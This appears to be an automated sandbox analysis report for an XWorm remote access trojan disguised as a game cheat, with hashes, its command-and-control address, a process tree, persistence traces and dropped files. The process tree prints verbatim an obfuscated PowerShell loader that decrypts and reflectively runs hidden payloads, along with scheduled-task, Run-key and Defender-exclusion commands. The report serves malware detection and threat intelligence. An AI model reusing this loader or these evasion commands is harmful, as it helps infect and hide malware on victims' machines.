xworm | 3572560b02c226e084c777096894c054e35f52722fe6dbbc3531d1bb08df9fff

Analysis

max time kernel
148s
max time network
146s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
19-08-2024 17:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ArsenalCheats.exe
Size

274KB
MD5

3b328fc362a6459ed7b74bb3b0b824f3
SHA1

8b5cf3e0c26109a67a3832eb7b63c0954d266b9b
SHA256

3572560b02c226e084c777096894c054e35f52722fe6dbbc3531d1bb08df9fff
SHA512

3c95ee1e07202c1a3580bc4433eb4c1dcb28b22c710d21a2852b6345b13b358e49df74337aff475b8f9df8bf845b18a48374612b1a278f06dfb4b7382c6025cc
SSDEEP

6144:bB5O/3TQG9zULZNv/KOrZTn5ZPUksUflro+CD0l:bBgn9zmZNv/K4ZT5ZP/sU9rjC4

Score

10^/10

xworm discovery execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

147.185.221.22:11860

Mutex

Wn4BW0u57Ed8grMl

Attributes

Install_directory
%LocalAppData%
install_file
Windows Host Proccess.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4300-220-0x0000000008F60000-0x0000000008F72000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	4300	powershell.exe
5	4300	powershell.exe
10	4300	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2188	powershell.exe
4300	powershell.exe
1608	powershell.exe
3980	powershell.exe
2200	powershell.exe
4308	powershell.exe
1152	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Proccess.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Proccess.lnk	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4880	Windows Host Proccess

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Proccess = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Proccess"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ArsenalCheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Windows Host Proccess

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3656	schtasks.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
1608	powershell.exe
1608	powershell.exe
1608	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
4300	powershell.exe
4300	powershell.exe
4300	powershell.exe
3980	powershell.exe
3980	powershell.exe
3980	powershell.exe
2200	powershell.exe
2200	powershell.exe
2200	powershell.exe
4308	powershell.exe
4308	powershell.exe
4308	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
4300	powershell.exe
4880	Windows Host Proccess
4880	Windows Host Proccess
4880	Windows Host Proccess

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeIncreaseQuotaPrivilege	2188	powershell.exe
Token: SeSecurityPrivilege	2188	powershell.exe
Token: SeTakeOwnershipPrivilege	2188	powershell.exe
Token: SeLoadDriverPrivilege	2188	powershell.exe
Token: SeSystemProfilePrivilege	2188	powershell.exe
Token: SeSystemtimePrivilege	2188	powershell.exe
Token: SeProfSingleProcessPrivilege	2188	powershell.exe
Token: SeIncBasePriorityPrivilege	2188	powershell.exe
Token: SeCreatePagefilePrivilege	2188	powershell.exe
Token: SeBackupPrivilege	2188	powershell.exe
Token: SeRestorePrivilege	2188	powershell.exe
Token: SeShutdownPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeSystemEnvironmentPrivilege	2188	powershell.exe
Token: SeRemoteShutdownPrivilege	2188	powershell.exe
Token: SeUndockPrivilege	2188	powershell.exe
Token: SeManageVolumePrivilege	2188	powershell.exe
Token: 33	2188	powershell.exe
Token: 34	2188	powershell.exe
Token: 35	2188	powershell.exe
Token: 36	2188	powershell.exe
Token: SeIncreaseQuotaPrivilege	2188	powershell.exe
Token: SeSecurityPrivilege	2188	powershell.exe
Token: SeTakeOwnershipPrivilege	2188	powershell.exe
Token: SeLoadDriverPrivilege	2188	powershell.exe
Token: SeSystemProfilePrivilege	2188	powershell.exe
Token: SeSystemtimePrivilege	2188	powershell.exe
Token: SeProfSingleProcessPrivilege	2188	powershell.exe
Token: SeIncBasePriorityPrivilege	2188	powershell.exe
Token: SeCreatePagefilePrivilege	2188	powershell.exe
Token: SeBackupPrivilege	2188	powershell.exe
Token: SeRestorePrivilege	2188	powershell.exe
Token: SeShutdownPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeSystemEnvironmentPrivilege	2188	powershell.exe
Token: SeRemoteShutdownPrivilege	2188	powershell.exe
Token: SeUndockPrivilege	2188	powershell.exe
Token: SeManageVolumePrivilege	2188	powershell.exe
Token: 33	2188	powershell.exe
Token: 34	2188	powershell.exe
Token: 35	2188	powershell.exe
Token: 36	2188	powershell.exe
Token: SeIncreaseQuotaPrivilege	2188	powershell.exe
Token: SeSecurityPrivilege	2188	powershell.exe
Token: SeTakeOwnershipPrivilege	2188	powershell.exe
Token: SeLoadDriverPrivilege	2188	powershell.exe
Token: SeSystemProfilePrivilege	2188	powershell.exe
Token: SeSystemtimePrivilege	2188	powershell.exe
Token: SeProfSingleProcessPrivilege	2188	powershell.exe
Token: SeIncBasePriorityPrivilege	2188	powershell.exe
Token: SeCreatePagefilePrivilege	2188	powershell.exe
Token: SeBackupPrivilege	2188	powershell.exe
Token: SeRestorePrivilege	2188	powershell.exe
Token: SeShutdownPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeSystemEnvironmentPrivilege	2188	powershell.exe
Token: SeRemoteShutdownPrivilege	2188	powershell.exe
Token: SeUndockPrivilege	2188	powershell.exe
Token: SeManageVolumePrivilege	2188	powershell.exe
Token: 33	2188	powershell.exe
Token: 34	2188	powershell.exe
Token: 35	2188	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4300	powershell.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 220 wrote to memory of 4488	220	ArsenalCheats.exe	73
PID 220 wrote to memory of 4488	220	ArsenalCheats.exe	73
PID 220 wrote to memory of 4488	220	ArsenalCheats.exe	73
PID 4488 wrote to memory of 4656	4488	cmd.exe	75
PID 4488 wrote to memory of 4656	4488	cmd.exe	75
PID 4488 wrote to memory of 4656	4488	cmd.exe	75
PID 4656 wrote to memory of 692	4656	net.exe	76
PID 4656 wrote to memory of 692	4656	net.exe	76
PID 4656 wrote to memory of 692	4656	net.exe	76
PID 4488 wrote to memory of 1608	4488	cmd.exe	77
PID 4488 wrote to memory of 1608	4488	cmd.exe	77
PID 4488 wrote to memory of 1608	4488	cmd.exe	77
PID 1608 wrote to memory of 2188	1608	powershell.exe	78
PID 1608 wrote to memory of 2188	1608	powershell.exe	78
PID 1608 wrote to memory of 2188	1608	powershell.exe	78
PID 1608 wrote to memory of 2972	1608	powershell.exe	81
PID 1608 wrote to memory of 2972	1608	powershell.exe	81
PID 1608 wrote to memory of 2972	1608	powershell.exe	81
PID 2972 wrote to memory of 2528	2972	WScript.exe	82
PID 2972 wrote to memory of 2528	2972	WScript.exe	82
PID 2972 wrote to memory of 2528	2972	WScript.exe	82
PID 2528 wrote to memory of 740	2528	cmd.exe	84
PID 2528 wrote to memory of 740	2528	cmd.exe	84
PID 2528 wrote to memory of 740	2528	cmd.exe	84
PID 740 wrote to memory of 4696	740	net.exe	85
PID 740 wrote to memory of 4696	740	net.exe	85
PID 740 wrote to memory of 4696	740	net.exe	85
PID 2528 wrote to memory of 4300	2528	cmd.exe	86
PID 2528 wrote to memory of 4300	2528	cmd.exe	86
PID 2528 wrote to memory of 4300	2528	cmd.exe	86
PID 4300 wrote to memory of 3980	4300	powershell.exe	88
PID 4300 wrote to memory of 3980	4300	powershell.exe	88
PID 4300 wrote to memory of 3980	4300	powershell.exe	88
PID 4300 wrote to memory of 2200	4300	powershell.exe	90
PID 4300 wrote to memory of 2200	4300	powershell.exe	90
PID 4300 wrote to memory of 2200	4300	powershell.exe	90
PID 4300 wrote to memory of 4308	4300	powershell.exe	92
PID 4300 wrote to memory of 4308	4300	powershell.exe	92
PID 4300 wrote to memory of 4308	4300	powershell.exe	92
PID 4300 wrote to memory of 1152	4300	powershell.exe	94
PID 4300 wrote to memory of 1152	4300	powershell.exe	94
PID 4300 wrote to memory of 1152	4300	powershell.exe	94
PID 4300 wrote to memory of 3656	4300	powershell.exe	96
PID 4300 wrote to memory of 3656	4300	powershell.exe	96
PID 4300 wrote to memory of 3656	4300	powershell.exe	96
PID 4300 wrote to memory of 2932	4300	powershell.exe	100
PID 4300 wrote to memory of 2932	4300	powershell.exe	100
PID 4300 wrote to memory of 2932	4300	powershell.exe	100

C:\Users\Admin\AppData\Local\Temp\ArsenalCheats.exe
"C:\Users\Admin\AppData\Local\Temp\ArsenalCheats.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:220
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\R.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4488
- - C:\Windows\SysWOW64\net.exe
    net file
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4656
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      System Location Discovery: System Language Discovery
      PID:692
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RYW9ggvUaR5JRJ1uessN0UgHvYjbDGgzfWY065YcerM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uR+Q8GE+5SFn27MTuZRc3A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $yQwop=New-Object System.IO.MemoryStream(,$param_var); $PuPlL=New-Object System.IO.MemoryStream; $zGCDC=New-Object System.IO.Compression.GZipStream($yQwop, [IO.Compression.CompressionMode]::Decompress); $zGCDC.CopyTo($PuPlL); $zGCDC.Dispose(); $yQwop.Dispose(); $PuPlL.Dispose(); $PuPlL.ToArray();}function execute_function($param_var,$param2_var){ $riOXx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQnac=$riOXx.EntryPoint; $JQnac.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\R.bat';$FkZfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\R.bat').Split([Environment]::NewLine);foreach ($zjqyf in $FkZfX) { if ($zjqyf.StartsWith(':: ')) { $Zodzv=$zjqyf.Substring(3); break; }}$payloads_var=[string[]]$Zodzv.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1608
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_397_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_397.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2188
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_397.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2972
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_397.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2528
      - C:\Windows\SysWOW64\net.exe
        
        net file
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:740
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4696
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RYW9ggvUaR5JRJ1uessN0UgHvYjbDGgzfWY065YcerM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uR+Q8GE+5SFn27MTuZRc3A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $yQwop=New-Object System.IO.MemoryStream(,$param_var); $PuPlL=New-Object System.IO.MemoryStream; $zGCDC=New-Object System.IO.Compression.GZipStream($yQwop, [IO.Compression.CompressionMode]::Decompress); $zGCDC.CopyTo($PuPlL); $zGCDC.Dispose(); $yQwop.Dispose(); $PuPlL.Dispose(); $PuPlL.ToArray();}function execute_function($param_var,$param2_var){ $riOXx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQnac=$riOXx.EntryPoint; $JQnac.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_397.bat';$FkZfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_397.bat').Split([Environment]::NewLine);foreach ($zjqyf in $FkZfX) { if ($zjqyf.StartsWith(':: ')) { $Zodzv=$zjqyf.Substring(3); break; }}$payloads_var=[string[]]$Zodzv.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Proccess'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Proccess'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1152
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Proccess" /tr "C:\Users\Admin\AppData\Local\Windows Host Proccess"
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3656
        
        C:\Windows\SysWOW64\CMD.EXE
        
        "CMD.EXE"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2932

C:\Users\Admin\AppData\Local\Windows Host Proccess
"C:\Users\Admin\AppData\Local\Windows Host Proccess"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
ac3d19fbb5c5f10833f1882308f77548

SHA1
ac880466fd99a5719fedc7289b00d78ba7088e06

SHA256
3353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df

SHA512
b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
3bb9dff7c2e77d54ad378e32ad0df75e

SHA1
9bc9e41e8e7189ed38dee4ae9e72e459b0ad5858

SHA256
f80dc76bbbf2bd4b5c58392a9a54cdc26838792abf9d1aab315dfb49ea90a025

SHA512
1b27e52772436913091b43e0bbabf5ebab749cced59471fdba49ef6c7c430773f623849ed08e31b7f018e0e037156d3af6744f9e84a29a9e6eb66962167411d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
7e38de640d036aba79bfbb9061d2b639

SHA1
aa035e5ed4824b5d70fa728aea5703e4b6dd2cc6

SHA256
7cefce986b0d52967ece115e66f632476750a138c7e0ee85dd9a1c1bea3c85ec

SHA512
d89dd8e62da72f7d0bcf92b26c680e2fe631ff88460e184359a2e8d44e8c3bb7631030db2053c8e2663825d841e331542ef6c677ce919e13f0fc29a8b119cd85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
7b846abb70e79662067af84398b7cacd

SHA1
c3976afdd25a169906ccc23b43c085236033883c

SHA256
59496b71edb1808b7f7e3419bc2a368d3ee378a6c3da080b233ee6f0088a063f

SHA512
05de222c1b39dddc348d77d17e491cc5d9122e78cede8b0c3cb2538fd5cd1fb0451819fbc1540fed8bdfcdf843638cf65746792782025eb5d1e58b89025ff1af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
acbf971af9a90ffc18a2000859bf028e

SHA1
ef8413ea17a4bdb529d9ef4096092619e499d1e0

SHA256
22f1851186e4a5ba853121cda7d4bb90dbd6cbdcab5f1dc065d974057b75edd7

SHA512
d3aa11680d7b71c413359e88c7b8764b43d813c0dbaf2e14744b271524221d0e0469fcdb4cc8af682d40bdc9806a3d5a2cae45adca9a885535c487cd383d3587

Download Submit
C:\Users\Admin\AppData\Local\Temp\R.bat

Filesize
270KB

MD5
b351e6715948f802c19611db86cc19ea

SHA1
a8bc001dc8c2e29d78579b7b1acb57be7e4e7f22

SHA256
e2ac8e1289dcd0c61d7bf98688a93bb2031b9fbc796053f965e1d8d311d2ede3

SHA512
07faa4232fca72d8158424d9e220229d0b072c6481f20cead89a07342b3d7037af7d302da23a726df9f90dfe6fad67c2a37f2a909a84852625e549c569a8a2cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_px3etk0i.be1.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Windows Host Proccess

Filesize
420KB

MD5
be8ffebe1c4b5e18a56101a3c0604ea0

SHA1
2ec8af7c1538974d64291845dcb02111b907770f

SHA256
d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5

SHA512
71008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_397.vbs

Filesize
115B

MD5
e82c9c366c6d169c82716150e5bbb55a

SHA1
8647490bd83ca1ee20604eb1e1b93069d437211e

SHA256
a56613061f1e9af2bd787e862fe6ea507fbaae5bf305dd7cfb901710d5a854c0

SHA512
3290311472303c730583d03bd1963b8c99bb5ecf3970d20238cda36e9fc08a33dddd2703e2107594ff91e7d3ecf3a8f192710beaf99d3692c646216dbd3ee26f

Download Submit
memory/1152-963-0x0000000070160000-0x00000000701AB000-memory.dmp

Filesize
300KB

Download
memory/1608-12-0x0000000007B00000-0x0000000007B66000-memory.dmp

Filesize
408KB

Download
memory/1608-13-0x0000000007B70000-0x0000000007EC0000-memory.dmp

Filesize
3.3MB

Download
memory/1608-17-0x0000000008490000-0x00000000084DB000-memory.dmp

Filesize
300KB

Download
memory/1608-33-0x0000000009A40000-0x000000000A0B8000-memory.dmp

Filesize
6.5MB

Download
memory/1608-34-0x0000000008FD0000-0x0000000008FEA000-memory.dmp

Filesize
104KB

Download
memory/1608-35-0x0000000008FF0000-0x0000000008FF8000-memory.dmp

Filesize
32KB

Download
memory/1608-46-0x0000000009280000-0x00000000092B4000-memory.dmp

Filesize
208KB

Download
memory/1608-47-0x000000000A0C0000-0x000000000A5BE000-memory.dmp

Filesize
5.0MB

Download
memory/1608-16-0x00000000079D0000-0x00000000079EC000-memory.dmp

Filesize
112KB

Download
memory/1608-18-0x00000000081A0000-0x0000000008216000-memory.dmp

Filesize
472KB

Download
memory/1608-11-0x0000000007A90000-0x0000000007AF6000-memory.dmp

Filesize
408KB

Download
memory/1608-10-0x0000000007180000-0x00000000071A2000-memory.dmp

Filesize
136KB

Download
memory/1608-8-0x0000000073560000-0x0000000073C4E000-memory.dmp

Filesize
6.9MB

Download
memory/1608-9-0x0000000007310000-0x0000000007938000-memory.dmp

Filesize
6.2MB

Download
memory/1608-7-0x0000000004AA0000-0x0000000004AD6000-memory.dmp

Filesize
216KB

Download
memory/1608-4-0x000000007356E000-0x000000007356F000-memory.dmp

Filesize
4KB

Download
memory/1608-191-0x0000000073560000-0x0000000073C4E000-memory.dmp

Filesize
6.9MB

Download
memory/1608-190-0x000000007356E000-0x000000007356F000-memory.dmp

Filesize
4KB

Download
memory/1608-205-0x0000000073560000-0x0000000073C4E000-memory.dmp

Filesize
6.9MB

Download
memory/2188-81-0x0000000009000000-0x0000000009094000-memory.dmp

Filesize
592KB

Download
memory/2188-80-0x0000000008E50000-0x0000000008EF5000-memory.dmp

Filesize
660KB

Download
memory/2188-73-0x0000000008CD0000-0x0000000008D03000-memory.dmp

Filesize
204KB

Download
memory/2188-75-0x0000000008CB0000-0x0000000008CCE000-memory.dmp

Filesize
120KB

Download
memory/2188-74-0x0000000070160000-0x00000000701AB000-memory.dmp

Filesize
300KB

Download
memory/2200-487-0x0000000070160000-0x00000000701AB000-memory.dmp

Filesize
300KB

Download
memory/3980-449-0x0000000008FA0000-0x0000000008FA8000-memory.dmp

Filesize
32KB

Download
memory/3980-444-0x0000000008FE0000-0x0000000008FFA000-memory.dmp

Filesize
104KB

Download
memory/3980-251-0x0000000008E60000-0x0000000008F05000-memory.dmp

Filesize
660KB

Download
memory/3980-246-0x0000000070160000-0x00000000701AB000-memory.dmp

Filesize
300KB

Download
memory/4300-220-0x0000000008F60000-0x0000000008F72000-memory.dmp

Filesize
72KB

Download
memory/4300-223-0x0000000009150000-0x00000000091EC000-memory.dmp

Filesize
624KB

Download
memory/4300-1186-0x000000000A3B0000-0x000000000A442000-memory.dmp

Filesize
584KB

Download
memory/4300-1187-0x0000000009100000-0x000000000910A000-memory.dmp

Filesize
40KB

Download
